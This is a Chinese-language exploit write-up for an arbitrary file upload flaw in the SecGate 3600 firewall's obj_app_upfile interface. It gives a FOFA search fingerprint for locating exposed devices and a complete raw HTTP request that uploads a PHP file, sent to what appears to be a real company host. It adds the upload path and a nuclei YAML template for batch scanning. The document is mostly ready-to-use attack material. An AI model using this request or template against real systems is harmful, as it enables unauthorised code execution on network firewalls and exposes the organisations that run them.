网神SecGate 3600防火墙obj_app_upfile任意文件上传漏洞
漏洞简介
网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限
影响范围
网神SecGate 3600防火墙
漏洞复现
fofa语法:fid="1Lh1LHi6yfkhiO83I59AYg=="
登录页面如下:
POC:
POST /?g=obj_app_upfile HTTP/1.1
Host: jg.zhongdinggroup.com:8889
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: text/plain
<?php phpinfo();?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
默认上传路径 /secgate/webui/attachements/ , 访问 attachements/test.php 文件
nuclei批量yaml文件
id: SecGate_3600_obj_app_upfile_upload
info:
name: 网神SecGate 3600防火墙obj_app_upfile任意文件上传漏洞
author: mhb17
severity: critical
tags: upload
description: fofa fid="1Lh1LHi6yfkhiO83I59AYg=="
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}.php"
requests:
- raw:
- |-
POST /?g=obj_app_upfile HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 549
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="{{file_name}}"
Content-Type: text/plain
<?php phpinfo();?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
- |+
GET /attachements/{{file_name}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body_2, 'phpinfo()')"
- "status_code_1 == 302 && status_code_2 == 200"
condition: and